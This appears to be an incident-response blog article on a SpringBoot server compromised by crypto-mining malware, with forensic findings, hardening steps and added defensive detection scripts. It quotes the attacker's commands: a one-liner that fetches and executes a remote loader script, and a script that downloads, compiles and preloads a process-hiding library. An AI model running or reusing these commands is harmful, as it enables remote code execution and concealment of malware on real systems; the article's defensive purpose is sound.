
How a SpringBoot Server Was Hijacked for Crypto Mining and What You Can Do

This article recounts a real‑world incident where a SpringBoot server was compromised by a crypto‑mining malware, details the malicious code and its actions, shows forensic traces left on the system, and provides step‑by‑step remediation and hardening recommendations.

Efficient Ops

Server Intrusion and Mining Process

On a Saturday night the author received an Alibaba Cloud alert about abnormal server behavior. Running netstat revealed a suspicious port, which pointed to a possible remote code execution (RCE) in a Java process and, most likely, a rootkit.

The immediate response was to migrate the service to a new instance, shut down the compromised server, and begin forensic analysis.

Intrusion Behavior Analysis

The compromised SpringBoot application had been shelled: the attacker obtained command execution and ran a base64‑encoded Python command that downloaded and executed a script from http://m.windowsupdatesupport.org/d/loader.py:

<code>python -c 'import urllib;exec urllib.urlopen("http://m.windowsupdatesupport.org/d/loader.py").read()'</code>

The downloaded script performed the following actions:

- Uninstalled security monitoring tools (e.g., Alibaba Cloud Shield).
- Killed all kworkers processes.
- Created a hidden .git directory and executed a kworkers binary.

The kworkers binary is a mining tool; its activity caused a short CPU spike lasting about five minutes.

Traces Left on the Server

After rebooting, the following artifacts were discovered:

- A crontab entry scheduling the malware to run daily (at 02:00):

<code># crontab -l
0 2 * * * /xxx/.git/kworkers</code>

- Various files under the malware’s home directory, including cert_key.pem and cert.pem (a public/private key pair).
- Extensive log output showing downloads of additional payloads, password harvesting, internal network scanning, and attempts to hide processes.

A particularly interesting payload was hideproc.sh, which compiles a malicious libc2.28.so shared library and registers it in /etc/ld.so.preload, effectively hiding the malware's processes from tools like netstat:

<code>if [ "$EUID" -ne 0 ]; then echo "Please run as root"; else
  if [ `grep libc2.28 /etc/ld.so.preload` ]; then echo "hideproc already done!!"; else
    apt-get update -y
    apt-get install build-essential -y
    yum check-update
    yum install build-essential -y
    dnf groupinstall "Development Tools" -y
    yum group install "Development Tools" -y
    curl http://m.windowsupdatesupport.org/d/processhider.c -o processhider.c
    gcc -Wall -fPIC -shared -o libc2.28.so processhider.c -ldl
    mv libc2.28.so /usr/local/lib/ -f
    grep libc2.28 /etc/ld.so.preload || echo /usr/local/lib/libc2.28.so >> /etc/ld.so.preload
    rm -f processhider.c
  fi
fi</code>
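The preload trick above works by hooking libc so that directory listings of /proc omit the hidden PIDs; a direct stat() of /proc/&lt;pid&gt; still succeeds, which is the same idea tools such as unhide rely on. The following script, added here as an example and not part of the article or the incident's own tooling, probes for that discrepancy and also audits the two residue types described earlier (a foreign entry in /etc/ld.so.preload and a cron job living in a hidden directory). The trusted library directories, the sample preload and crontab contents, and the hidden-directory heuristic are assumptions, constructed to mirror the traces in the write-up.

```python
"""Audit checks for the kind of residue described above: a process hidden by
an LD_PRELOAD hook, a foreign entry in /etc/ld.so.preload and a cron job
living in a hidden directory.  Added example, not code from the article;
all sample inputs are constructed."""
import os
import re
from typing import Callable, Iterable, List

# Where a legitimately installed preload library is expected to live.
# This allowlist is an assumption; adjust it to your distribution.
TRUSTED_PRELOAD_DIRS = ("/lib/", "/lib64/", "/usr/lib/", "/usr/lib64/")


def find_hidden_pids(visible: Iterable[str], pid_exists: Callable[[int], bool],
                     pid_max: int) -> List[int]:
    """A userland rootkit that hooks readdir() can drop entries from a
    listing of /proc, but a direct stat() of /proc/<pid> still succeeds.
    Return every PID that answers a direct probe yet is missing from the
    listing.  `visible` is the directory listing, `pid_exists` the probe."""
    listed = {int(name) for name in visible if name.isdigit()}
    return [pid for pid in range(1, pid_max + 1)
            if pid_exists(pid) and pid not in listed]


def find_hidden_pids_live() -> List[int]:
    """Run the probe against the real /proc of this host."""
    with open("/proc/sys/kernel/pid_max") as fh:
        pid_max = int(fh.read())
    return find_hidden_pids(os.listdir("/proc"),
                            lambda pid: os.path.exists(f"/proc/{pid}/status"),
                            pid_max)


def audit_preload(contents: str) -> List[str]:
    """Return entries of an /etc/ld.so.preload file that deserve a look:
    libraries outside the distribution directories, or libraries in a
    trusted directory whose name mimics the C library (libc2.28.so above)."""
    findings = []
    for line in contents.splitlines():
        path = line.strip()
        if not path or path.startswith("#"):
            continue
        if not path.startswith(TRUSTED_PRELOAD_DIRS):
            findings.append(f"untrusted location: {path}")
        elif re.match(r"libc\d", os.path.basename(path)):
            findings.append(f"libc lookalike: {path}")
    return findings


def audit_crontab(contents: str) -> List[str]:
    """Flag commands in `crontab -l` output (five time fields, then the
    command) whose path passes through a hidden directory, as the
    /xxx/.git/kworkers job did.  @reboot-style lines are skipped."""
    findings = []
    for line in contents.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(None, 5)
        if len(fields) < 6:
            continue
        command = fields[5]
        # a path component that starts with '.' (but is not '.' or '..')
        if re.search(r"(^|/)\.[^/\s.][^/\s]*/", command):
            findings.append(command)
    return findings


# Constructed samples mirroring the traces described in the article.
SAMPLE_PRELOAD = "/usr/local/lib/libc2.28.so\n"
SAMPLE_CRONTAB = "# crontab -l\n0 2 * * * /xxx/.git/kworkers\n"

if __name__ == "__main__":
    print("preload findings:", audit_preload(SAMPLE_PRELOAD))
    print("crontab findings:", audit_crontab(SAMPLE_CRONTAB))
    if os.path.isdir("/proc"):
        print("hidden PIDs on this host:", find_hidden_pids_live())
```

The PID probe only catches hooks that filter directory listings; a library that also intercepts stat() and open() would fool this script too, so on a host you do not trust, run the check from a statically linked binary or mount the disk from a rescue environment and audit /etc/ld.so.preload and the crontabs offline.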

Network logs also revealed a brute‑force attempt from an IP located in Beijing, likely a compromised bot.

Solution

Since the exact vulnerable SpringBoot dependency was not identified, the following mitigation steps were applied:

- Reinstall the operating system on the compromised server.
- Run the SpringBoot application under a non‑root user.
- Enforce basic authentication for the subsystem using htpasswd and configure Nginx accordingly:

<code>apt install -y apache2-utils
# -c creates the password file on first use; omit it when adding further users
htpasswd -c /etc/nginx/conf.d/.htpasswd user</code>

<code>server {
  ...
  auth_basic "Subsystem Authentication";
  auth_basic_user_file /etc/nginx/conf.d/.htpasswd;
  ...
}</code>

- Restrict outbound connections with firewall rules.

These measures reduce the risk of similar attacks, but identifying and patching the vulnerable library remains essential.
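Once auth_basic is in front of the subsystem, every rejected credential shows up as an HTTP 401 in the Nginx access log, which makes the kind of brute‑force attempt seen in the network logs easy to spot. The script below is an added example, not code from the article: it parses Nginx's default "combined" log format and reports any client that produced a burst of 401s within a sliding window. The log lines, the addresses, the date and the threshold are all constructed assumptions.

```python
"""Spot credential brute forcing against the basic-auth protected subsystem
from Nginx access logs.  Added example, not code from the article; the log
lines below are constructed and the format assumed is Nginx's default
"combined" format."""
import re
from collections import defaultdict, deque
from datetime import datetime
from typing import Dict, Iterable, List, Optional

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<bytes>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"'
)


def parse_line(line: str) -> Optional[dict]:
    """Parse one combined-format line; return None for lines that do not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {
        "ip": m["ip"],
        "user": m["user"],
        "time": datetime.strptime(m["time"], "%d/%b/%Y:%H:%M:%S %z"),
        "request": m["request"],
        "status": int(m["status"]),
    }


def find_bruteforce(lines: Iterable[str], threshold: int = 10,
                    window_seconds: int = 60) -> Dict[str, int]:
    """Return {ip: peak} for every client that produced at least `threshold`
    HTTP 401 responses inside some `window_seconds` sliding window, where
    peak is the largest number of 401s seen in one window.  With auth_basic
    enabled, a 401 is exactly a rejected credential."""
    failures = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and rec["status"] == 401:
            failures[rec["ip"]].append(rec["time"])
    offenders = {}
    for ip, times in failures.items():
        times.sort()
        window = deque()
        peak = 0
        for t in times:
            window.append(t)
            # drop failures that fell out of the window ending at t
            while (t - window[0]).total_seconds() > window_seconds:
                window.popleft()
            peak = max(peak, len(window))
        if peak >= threshold:
            offenders[ip] = peak
    return offenders


def _line(ip: str, ts: str, status: int, user: str = "-") -> str:
    """Build one constructed combined-format log line."""
    return (f'{ip} - {user} [{ts}] "GET /subsystem/ HTTP/1.1" {status} 0 '
            f'"-" "Mozilla/5.0"')


# Constructed sample: twelve rejected logins in 33 seconds from one address,
# one mistyped password followed by a normal request from another.
SAMPLE_LOG: List[str] = [
    _line("203.0.113.5", f"05/Oct/2019:22:10:{3 * i:02d} +0800", 401, "admin")
    for i in range(12)
]
SAMPLE_LOG += [
    _line("198.51.100.7", "05/Oct/2019:22:11:00 +0800", 401, "user"),
    _line("198.51.100.7", "05/Oct/2019:22:11:04 +0800", 200, "user"),
]

if __name__ == "__main__":
    for ip, peak in find_bruteforce(SAMPLE_LOG).items():
        print(f"{ip}: {peak} failed logins within 60 s")
```

The sliding window rather than a plain per-IP total is what keeps a user who mistypes a password a few times a day out of the report while still catching a burst of guesses; the offending addresses are a natural input for the outbound and inbound firewall rules mentioned above.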

Conclusion

The incident turned out to be a crypto‑mining malware that did not alter server data, thanks to timely alerts from Alibaba Cloud. It serves as a reminder to avoid running services as root, enforce strict firewall policies, maintain security monitoring, and keep regular backups.

Written by Efficient Ops

This public account is maintained by Xiaotianguo and friends and regularly publishes widely read original technical articles. We focus on operations transformation and accompany you throughout your operations career, growing together.
